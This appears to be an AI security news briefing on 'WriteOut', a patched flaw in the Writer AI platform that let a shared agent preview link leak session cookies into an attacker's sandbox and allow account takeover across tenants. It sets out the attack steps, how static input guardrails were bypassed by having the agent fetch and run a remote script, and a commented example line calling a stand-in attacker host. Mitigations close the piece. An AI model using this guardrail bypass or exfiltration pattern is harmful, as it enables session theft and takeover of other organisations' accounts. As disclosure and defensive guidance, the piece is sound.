LIVE FEED
FIRST LOOK First Look: Y Combinator's Garry Tan Deploys Agentic AI for High-Volume Code Generation // HIGH Phishing-as-a-Service Ring Weaponises Gemini to Clone Government Sites // CRITICAL Session Token Leak in Writer AI Enables Cross-Tenant Account Takeover // MEDIUM CISA Deploys Anthropic LLM to Audit Government Software Attack Surfaces // FIRST LOOK First Look: Tencent Releases Hy3 295B MoE Open-Source Model with 256K Context // FIRST LOOK First Look: NVIDIA and Hugging Face Integrate GR00T 1.7 into LeRobot Open Robotics … // FIRST LOOK First Look: AWS Launches Multi-Turn RL Infrastructure for Amazon Nova on SageMaker … // FIRST LOOK First Look: OfficeCLI Ships Open-Source Microsoft Office Automation Suite for AI Agents // HIGH Indirect Prompt Injections Weaponised to Drain Crypto via AI Agents // HIGH SkillCloak Bypasses AI Agent Skill Scanners with 90%+ Success Rate //
ATLAS OWASP CRITICAL Active exploitation · Immediate action required RELEVANCE ▲ 9.2

Session Token Leak in Writer AI Enables Cross-Tenant Account Takeover

TL;DR CRITICAL
  • What happened: A single preview link in Writer AI could steal session tokens and hijack accounts across any organisation.
  • Who's at risk: All enterprise Writer AI users are at risk — an attacker needed no prior access to any victim organisation to execute the attack.
  • Act now: Verify your Writer platform instance is running the patched version with sandbox origin isolation · Rotate all active Writer session tokens and LLM credentials stored within the platform · Audit agent-sharing permissions and restrict public preview link generation to trusted users
Session Token Leak in Writer AI Enables Cross-Tenant Account Takeover

Overview

Researchers at Sand Security have disclosed a now-patched critical vulnerability in Writer, an enterprise generative AI platform used by large organisations. Codenamed WriteOut, the flaw enabled a full cross-tenant account takeover via a single shared link — no prior foothold in the victim’s organisation required. The attack targeted Writer’s live agent preview feature, exploiting a failure to isolate session cookies from attacker-controlled sandbox environments.

The severity is underscored by what a successful attacker could access: private chats, documents, agent configurations, private model definitions, connector credentials, and LLM API keys — with potential for full administrative control depending on victim role.

Technical Analysis

The attack chain is elegantly simple and devastatingly effective:

  1. Attacker creates a malicious Writer agent in their own legitimate account with a live preview configured.
  2. Attacker shares the public preview link — no social engineering context required beyond delivering a URL.
  3. Victim clicks the link while authenticated to Writer. The browser attaches the victim’s session cookie to the preview request.
  4. Writer’s preview proxy forwards that cookie into the attacker’s sandbox — a critical design failure in session boundary enforcement.
  5. Attacker-controlled code inside the sandbox reads the session token from memory or forwarded headers and exfiltrates it to an external server.
  6. Attacker replays the token to assume full control of the victim’s Writer session.

Writer did implement input-side guardrails — filtering attempts to read environment variables or inject obviously malicious inline code. However, these checks evaluated the instruction, not runtime behaviour. The bypass was straightforward: rather than embedding the payload inline, the attacker instructed the agent to fetch and execute a remote script, entirely circumventing static input inspection.

# Conceptual bypass — agent instruction example
# Instead of inline payload (blocked):
# exec(os.environ['SESSION_TOKEN'])  <-- filtered

# Attacker uses remote fetch (not filtered):
# fetch('https://attacker.io/payload.py') and execute at runtime

This illustrates a fundamental weakness in agent sandbox security: perimeter-based input filtering is insufficient when agents have network egress and dynamic code execution capabilities.

Framework Mapping

  • AML.T0051 (LLM Prompt Injection): The agent was instructed to execute attacker-defined logic, abusing the agent’s instruction surface.
  • AML.T0057 (LLM Data Leakage): Session tokens and sensitive account data were leaked out of the platform boundary.
  • AML.T0012 (Valid Accounts): The replayed session token granted the attacker authenticated access indistinguishable from a legitimate user.
  • LLM07 (Insecure Plugin Design): The preview sandbox acted as an unintended execution bridge between tenants.
  • LLM08 (Excessive Agency): The sandbox had unrestricted network access enabling token exfiltration.

Impact Assessment

WriteOut is rated critical due to its zero-prerequisite exploitation model. Any authenticated Writer user across any enterprise tenant is a valid target. The attacker requires only a Writer account to craft the malicious agent. Exposure includes sensitive enterprise data, LLM API credentials, and potential for privilege escalation to org-admin level. The shared responsibility model is directly undermined as tenant isolation — a foundational enterprise security guarantee — was broken at the platform level.

Mitigation & Recommendations

  • Verify patch status: Confirm your Writer environment reflects the fix that strips session cookies from sandbox preview requests and enforces isolated origins.
  • Rotate credentials: Treat all Writer session tokens and stored LLM credentials as potentially compromised if exposure window overlaps with the vulnerability period.
  • Restrict preview sharing: Limit agent preview link generation to verified internal users; disable public preview links where not operationally required.
  • Implement runtime sandboxing controls: Block outbound network requests from agent sandboxes unless explicitly allowlisted.
  • Adopt behaviour-based guardrails: Input filtering alone is insufficient — monitor runtime execution patterns within agent sandboxes.

References

◉ AI THREAT BRIEFING

Stay ahead of the threat.

Twice-weekly digest of critical AI security developments — every story mapped to MITRE ATLAS and OWASP LLM Top 10. Free.

No spam. Unsubscribe anytime.